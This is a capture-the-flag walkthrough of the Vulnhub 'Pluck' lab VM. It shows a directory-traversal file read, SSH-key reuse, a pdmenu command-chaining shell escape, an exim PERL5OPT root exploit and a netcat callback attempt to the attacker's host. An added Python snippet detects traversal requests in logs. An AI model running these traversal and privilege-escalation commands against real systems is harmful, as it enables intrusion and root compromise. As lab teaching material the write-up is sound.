Vulnhub.com — Pluck VM Walkthrough

Datetime: 2017-04-11 05:55:32    Topic: Apache HTTP Server

What the Pluck!?

If you want to play along Pluck can be found here:

https://www.vulnhub.com/entry/pluck-1,178/

The usual arp-scan entry point to find our host.

The obligatory nmap giving us 4 ports to consider.

Let’s start with Nikto’ing the web server

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2017-03-11 12:48:00 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2017-03-11 12:48:19 (GMT-5) (19 seconds)

So we have a reasonably juicy directory traversal to play with. Let's see what we can do with it.
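The same traversal seen from the server side, as an added example that is not part of the original walkthrough: a Python script that parses constructed Apache access-log lines modelled on the requests used in this post (the `page=` parameter carrying `../`, an absolute path, and single or double percent-encoding) and flags the ones that look like traversal or local file inclusion. The log lines are constructed; the `page` parameter name and the request shapes come from this page.

```python
import re
from urllib.parse import unquote

# Constructed Apache access-log lines (Common Log Format). The first four mirror
# the requests used in this walkthrough; the last one is a benign page request.
SAMPLE_LOG = """\
192.168.56.103 - - [11/Mar/2017:12:48:05 -0500] "GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1" 200 2314
192.168.56.103 - - [11/Mar/2017:12:50:11 -0500] "GET /index.php?page=/usr/local/scripts/backup.sh HTTP/1.1" 200 1876
192.168.56.103 - - [11/Mar/2017:12:55:40 -0500] "GET /index.php?page=%2Fbackups%2Fbackup.tar HTTP/1.1" 200 51200
192.168.56.103 - - [11/Mar/2017:12:58:02 -0500] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2314
192.168.56.1 - - [11/Mar/2017:13:01:00 -0500] "GET /index.php?page=about HTTP/1.1" 200 845
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%252e -> %2e -> .) are caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(path):
    """Return why a request looks like traversal/LFI, or None if it looks clean."""
    if "?" not in path:
        return None
    for param in decode_fully(path.split("?", 1)[1]).split("&"):
        name, _, val = param.partition("=")
        if name != "page":          # the include parameter this VM's index.php uses
            continue
        if "../" in val or "..\\" in val:
            return "dot-dot traversal"
        if val.startswith("/"):
            return "absolute path include"
    return None

def find_lfi_attempts(log_text):
    """Return (ip, path, status, reason) for every suspicious request in the log."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (reason := classify(m.group("path"))):
            hits.append((m.group("ip"), m.group("path"), int(m.group("status")), reason))
    return hits

for ip, path, status, reason in find_lfi_attempts(SAMPLE_LOG):
    print(f"{ip} {status} {reason}: {path}")
```

A 200 status on such a request, as in the constructed lines above, is the signal that the include actually succeeded rather than being blocked.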

HTTP landing page

So we can get at /etc/passwd and see all those lovely, lovely creds.

Yum!

And of specific interest is this little beauty, a backup script!

backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh

Let's curl that bad boy, and we get a backup location!

root@kali:~/Desktop/pluck# curl "http://192.168.56.101/index.php?page=/usr/local/scripts/backup.sh"
--snip--
########################
# Server Backup script #
########################
#Backup directories in /backups so we can get it via tftp
echo "Backing up data"
tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2& > /dev/null
echo "Backup complete"
--snip--

Now I got stuck here for a fair while for stupid STUPID reasons. I thought that the download kept failing.

It turns out it wasn't, and I just hadn't ls'ed to see it sat there waiting for me! Grrrrrrrr. Extracting it, we see a few directories (var, ome and home).

root@kali:~/Desktop/pluck# ls
index.php?page=%2Fbackups%2Fbackup.tar log passwd.txt rubber-duck.jpg users.txt
root@kali:~/Desktop/pluck# tar -xf index.php\?page\=%2Fbackups%2Fbackup.tar
tar: This does not look like a tar archive
tar: Skipping to next header
tar: Skipping to next header
8< ------------------------------- SNIP
root@kali:~/Desktop/pluck# ls
home index.php?page=%2Fbackups%2Fbackup.tar log ome passwd.txt rubber-duck.jpg users.txt var
root@kali:~/Desktop/pluck# cd home/
root@kali:~/Desktop/pluck/home# ls
bob paul peter

Recursive searching and we see some things of interest.

root@kali:~/Desktop/pluck/home# ls -alhR
.:
total 20K
drwxr-xr-x 5 root root 4.0K Jan 18 03:27 .
drwxr-xr-x 5 root root 4.0K Mar 15 15:28 ..
drwxr-xr-x 2 1000 1000 4.0K Jan 18 07:43 bob
drwxr-xr-x 3 1002 1002 4.0K Jan 18 13:13 paul
drwxr-xr-x 2 1001 1001 4.0K Jan 18 03:04 peter
./bob:
total 20K
drwxr-xr-x 2 1000 1000 4.0K Jan 18 07:43 .
drwxr-xr-x 5 root root 4.0K Jan 18 03:27 ..
-rw-r--r-- 1 1000 1000 220 Jan 18 00:39 .bash_logout
-rw-r--r-- 1 1000 1000 3.7K Jan 18 00:39 .bashrc
-rw-r--r-- 1 1000 1000 655 Jan 18 00:39 .profile
-rw-r--r-- 1 1000 1000 0 Jan 18 03:40 .sudo_as_admin_successful
./paul:
total 24K
drwxr-xr-x 3 1002 1002 4.0K Jan 18 13:13 .
drwxr-xr-x 5 root root 4.0K Jan 18 03:27 ..
-rw-r--r-- 1 1002 1002 220 Jan 18 03:04 .bash_logout
-rw-r--r-- 1 1002 1002 3.7K Jan 18 03:04 .bashrc
drwxrwxr-x 2 1002 1002 4.0K Jan 18 13:09 keys
-rw-r--r-- 1 1002 1002 655 Jan 18 03:04 .profile
./paul/keys:
total 56K
drwxrwxr-x 2 1002 1002 4.0K Jan 18 13:09 .
drwxr-xr-x 3 1002 1002 4.0K Jan 18 13:13 ..
-rwxrwxr-x 1 1002 1002 668 Jan 18 13:08 id_key1
-rwxrwxr-x 1 1002 1002 600 Jan 18 13:08 id_key1.pub
-rwxrwxr-x 1 1002 1002 672 Jan 18 13:08 id_key2
-rwxrwxr-x 1 1002 1002 600 Jan 18 13:08 id_key2.pub
-rwxrwxr-x 1 1002 1002 668 Jan 18 13:08 id_key3
-rwxrwxr-x 1 1002 1002 600 Jan 18 13:08 id_key3.pub
-rwxrwxr-x 1 1002 1002 1.7K Jan 18 13:09 id_key4
-rwxrwxr-x 1 1002 1002 392 Jan 18 13:09 id_key4.pub
-rwxrwxr-x 1 1002 1002 668 Jan 18 13:08 id_key5
-rwxrwxr-x 1 1002 1002 600 Jan 18 13:08 id_key5.pub
-rwxrwxr-x 1 1002 1002 1.7K Jan 18 13:09 id_key6
-rwxrwxr-x 1 1002 1002 392 Jan 18 13:09 id_key6.pub
./peter:
total 20K
drwxr-xr-x 2 1001 1001 4.0K Jan 18 03:04 .
drwxr-xr-x 5 root root 4.0K Jan 18 03:27 ..
-rw-r--r-- 1 1001 1001 220 Jan 18 03:04 .bash_logout
-rw-r--r-- 1 1001 1001 3.7K Jan 18 03:04 .bashrc
-rw-r--r-- 1 1001 1001 655 Jan 18 03:04 .profile

A bash loop to investigate what the files are shows that they are a range of SSH keys of varying types.

Trying each one in turn…

Until eventually we hit: PDMenu

Using the above documentation I went to the menu file (/home/paul/.pdmenurc).

And added in a netcat command back to my attacking host.

Didn’t bloody work though, did it?

So next I used the edit file option to drop a php webshell in a writable location, genius!

It didn't have executable permissions though! Let's add that into the menu too! More genius!

Run it and check the file's permissions.

and………….. That didn't work either. (I won't bore you with a screen of NC not receiving a connection!)

So I spent quite a while fiddling around with webshells and nc and getting nowhere. I tried various shell escapes out of VIM. Then in a third stroke of genius (after staring at .pdmenurc for agggggges) I wondered if chaining commands in the file edit options would let me in… passing it the id command

and after dropping out of vim… it ran! w00p.

So repeating the steps but passing /bin/bash and it drops me into a low priv shell (Good times).

Checking for files that run as their owner rather than the user who started them (as part of the amazing resource that is G0tM1lk's Linux escalation post) I see exim. I've come across, and exploited, this before, so this bit was trivial.

If you want to look it up on exploit-db it’s this one:

And this is how it is used (note this is changed from the PoC on exploit-db to point at a location that exists on this filesystem, in this case /usr/exim/bin/exim):

paul@pluck:/usr/exim/bin$ PERL5OPT="-d/dev/null" /usr/exim/bin/exim -ps victim@localhost

Loading DB routines from perl5db.pl version 1.49
Editor support available.

Enter h or 'h h' for help, or 'man perldebug' for more help.

Debugged program terminated. Use q to quit or R to restart,
use o inhibit_exit to avoid stopping after program termination,
h q, h R or h o to get additional info.
DB<1> p system("id");
uid=0(root) gid=1002(paul) groups=1002(paul)
0
DB<2> p system("nc -nv 192.168.56.103");
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
[-P proxy_username] [-p source_port] [-q seconds] [-s source]
[-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [destination] [port]
256
DB<3> p system("/bin/bash");
root@pluck:/usr/exim/bin# id
uid=0(root) gid=1002(paul) groups=1002(paul)
root@pluck:/usr/exim/bin# whoami
root
root@pluck:/usr/exim/bin# cd /root
root@pluck:/root# ls
flag.txt
root@pluck:/root# cat flag.txt

Congratulations you found the flag

---------------------------------------

###### ((((((((((((((((((((((((((((((
######### (((((((((((((((((((((((((((
,,########## ((((((((((((((((((((((((
@@,,,########## (((((((((((((((((((((
@@@@@,,,##########
@@@@@@@@,,,############################
@@@@@@@@@@@,,,#########################
@@@@@@@@@,,,###########################
@@@@@@,,,##########
@@@,,,########## &&&&&&&&&&&&&&&&&&&&
,,,########## &&&&&&&&&&&&&&&&&&&&&&&
########## &&&&&&&&&&&&&&&&&&&&&&&&&&
####### &&&&&&&&&&&&&&&&&&&&&&&&&&&&&

As you can see I also tried to nc out (because I couldn’t get that to work using the local file include/dir traversal with a php webshell, apparently that's due to this being the openbsd package).